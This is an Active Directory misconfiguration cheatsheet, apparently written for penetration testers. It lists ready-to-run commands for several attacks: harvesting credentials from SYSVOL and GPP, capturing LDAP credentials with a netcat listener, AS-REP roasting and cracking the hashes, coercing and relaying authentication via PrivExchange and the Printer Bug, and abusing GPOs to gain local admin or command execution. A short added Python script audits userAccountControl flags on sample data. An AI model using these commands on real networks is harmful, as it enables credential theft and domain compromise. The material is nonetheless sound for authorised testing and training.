Miscellaneous Misconfigurations Cheatsheet
Credential Harvesting
Passwords in Description Field
Get-DomainUser * | Select-Object samaccountname,description | Where-Object {$_.Description -ne $null}
PASSWD_NOTREQD Accounts
Get-DomainUser -UACFilter PASSWD_NOTREQD | Select-Object samaccountname,useraccountcontrol
SYSVOL Script Hunting
ls \\<DC>\SYSVOL\<DOMAIN>\scripts
cat \\<DC>\SYSVOL\<DOMAIN>\scripts\<interesting_script>
GPP Passwords
# Decrypt cpassword
gpp-decrypt <CPASSWORD_VALUE>
# CrackMapExec modules
crackmapexec smb <DC_IP> -u <USER> -p <PASS> -M gpp_password
crackmapexec smb <DC_IP> -u <USER> -p <PASS> -M gpp_autologin
# PowerSploit
Get-GPPPassword
Get-GPPAutologon
Sniff LDAP Credentials
# Listen for LDAP test connections from printers/apps
nc -lvnp 389
Change the LDAP server IP in the device’s admin console to your attack host, then trigger “Test Connection.”
ASREPRoasting
Enumerate (Windows)
Get-DomainUser -PreauthNotRequired | select samaccountname,userprincipalname,useraccountcontrol | fl
Attack (Windows — Rubeus)
.\Rubeus.exe asreproast /user:<USER> /nowrap /format:hashcat
Attack (Linux — Impacket)
GetNPUsers.py DOMAIN/ -dc-ip <DC_IP> -no-pass -usersfile valid_ad_users
Attack (Linux — Kerbrute)
kerbrute userenum -d <DOMAIN> --dc <DC_IP> /path/to/userlist.txt
Crack
hashcat -m 18200 asrep_hashes /usr/share/wordlists/rockyou.txt
Force DONT_REQ_PREAUTH (requires GenericWrite/GenericAll)
Set-DomainObject -Identity <USER> -XOR @{useraccountcontrol=4194304}
# After the attack, run the same -XOR command again: XOR toggles the bit, so a second run clears DONT_REQ_PREAUTH
Set-DomainObject -Identity <USER> -XOR @{useraccountcontrol=4194304}
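Added audit example (not part of the original cheatsheet, not PowerView code): it decodes userAccountControl bits so you can see why the -UACFilter and -PreauthNotRequired checks above work and why XOR-ing 4194304 twice is a no-op, and runs the description / PASSWD_NOTREQD / pre-auth checks over a constructed sample export. Flag values are the documented userAccountControl bits; the sample accounts and the description regex are assumptions.

```python
import re

# Subset of the documented userAccountControl bit flags
UAC_FLAGS = {
    0x0002: "ACCOUNTDISABLE",
    0x0020: "PASSWD_NOTREQD",
    0x0200: "NORMAL_ACCOUNT",
    0x10000: "DONT_EXPIRE_PASSWORD",
    0x80000: "TRUSTED_FOR_DELEGATION",
    0x400000: "DONT_REQ_PREAUTH",
}
PASSWD_NOTREQD = 0x20
DONT_REQ_PREAUTH = 0x400000  # 4194304, the value the -XOR command above flips

# Loose, assumed pattern for credential-looking text in description fields
SECRET_RE = re.compile(r"\b(pass(word|wd)?|pwd?|creds?)\b[\s:=-]*\S+", re.I)

def decode_uac(value):
    """Names of the flags set in a userAccountControl integer, lowest bit first."""
    return [name for bit, name in sorted(UAC_FLAGS.items()) if value & bit]

def toggle_preauth(value):
    """Same effect as Set-DomainObject -XOR @{useraccountcontrol=4194304}: flips one bit."""
    return value ^ DONT_REQ_PREAUTH

def audit(users):
    """Return (account, issue) pairs for the checks in this cheatsheet's first sections."""
    findings = []
    for u in users:
        uac = u["userAccountControl"]
        if uac & PASSWD_NOTREQD:
            findings.append((u["samAccountName"], "PASSWD_NOTREQD"))
        # Disabled accounts cannot be AS-REP roasted, so only report enabled ones
        if uac & DONT_REQ_PREAUTH and not uac & 0x2:
            findings.append((u["samAccountName"], "ASREP-roastable"))
        if u.get("description") and SECRET_RE.search(u["description"]):
            findings.append((u["samAccountName"], "credential in description"))
    return findings

# Constructed sample export, not real directory data
SAMPLE_USERS = [
    {"samAccountName": "svc_backup", "userAccountControl": 0x200 | 0x10000 | 0x400000, "description": "Backup service"},
    {"samAccountName": "helpdesk1", "userAccountControl": 0x200, "description": "Temp pw: Welcome123!"},
    {"samAccountName": "guest_old", "userAccountControl": 0x200 | 0x2 | 0x20, "description": None},
    {"samAccountName": "jdoe", "userAccountControl": 0x200, "description": "Accounting"},
]

if __name__ == "__main__":
    for name, issue in audit(SAMPLE_USERS):
        print(f"{name}: {issue}")
```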
Exchange Abuse
Enumerate Exchange Group Membership
Get-DomainGroupMember "Exchange Windows Permissions" | select MemberName
Get-DomainGroupMember "Organization Management" | select MemberName
PrivExchange
Requires any domain user with a mailbox. Forces Exchange to authenticate to attacker host → relay to LDAP → DCSync.
Printer Bug (MS-RPRN)
Enumerate
Import-Module .\SecurityAssessment.ps1
Get-SpoolStatus -ComputerName <TARGET_FQDN>
Exploit
Coerce authentication to attacker host, then relay (e.g., to LDAP for DCSync rights or RBCD).
DNS Record Enumeration
# Initial dump
adidnsdump -u DOMAIN\\user ldap://<DC_IP>
head records.csv
# Resolve unknown records
adidnsdump -u DOMAIN\\user ldap://<DC_IP> -r
head records.csv
GPO Abuse
Enumerate
# List all GPOs
Get-DomainGPO | select displayname
# Check Domain Users rights over GPOs
$sid = Convert-NameToSid "Domain Users"
Get-DomainGPO | Get-ObjectAcl | ? {$_.SecurityIdentifier -eq $sid}
# Resolve GUID to GPO name
Get-GPO -Guid <GUID>
Exploit (SharpGPOAbuse)
# Add local admin
.\SharpGPOAbuse.exe --AddLocalAdmin --UserAccount <USER> --GPOName "<GPO_NAME>"
# Add user privilege
.\SharpGPOAbuse.exe --AddUserRights --UserRights "SeDebugPrivilege" --UserAccount <USER> --GPOName "<GPO_NAME>"
# Create immediate scheduled task
.\SharpGPOAbuse.exe --AddComputerTask --TaskName "<TASK>" --Author DOMAIN\admin --Command "cmd.exe" --Arguments "/c <COMMAND>" --GPOName "<GPO_NAME>"
BloodHound
Look for edges: GenericWrite, WriteOwner, WriteDacl on GPO objects. Check “Affected Objects” tab to see linked OUs and computers.
Audit
Audit tooling for reviewing GPO permissions and settings: group3r, ADRecon, PingCastle
Quick Reference
| Misconfiguration | Tool | Impact |
|---|---|---|
| Password in Description | PowerView Get-DomainUser | Credential harvesting |
| PASSWD_NOTREQD | PowerView -UACFilter | Empty/weak password accounts |
| SYSVOL scripts | Manual / Snaffler | Plaintext credentials |
| GPP passwords | gpp-decrypt / CrackMapExec | Decryptable credentials |
| LDAP creds in devices | netcat listener | Service account credentials |
| ASREPRoasting | Rubeus / GetNPUsers.py / Kerbrute | Offline hash cracking |
| Exchange groups | PowerView group enumeration | DCSync / mailbox access |
| PrivExchange | ntlmrelayx.py | Domain Admin |
| Printer Bug | Get-SpoolStatus / SpoolSample | NTLM relay → DCSync / RBCD |
| DNS records | adidnsdump | Hidden host discovery |
| GPO abuse | SharpGPOAbuse / BloodHound | Local admin / priv esc / RCE |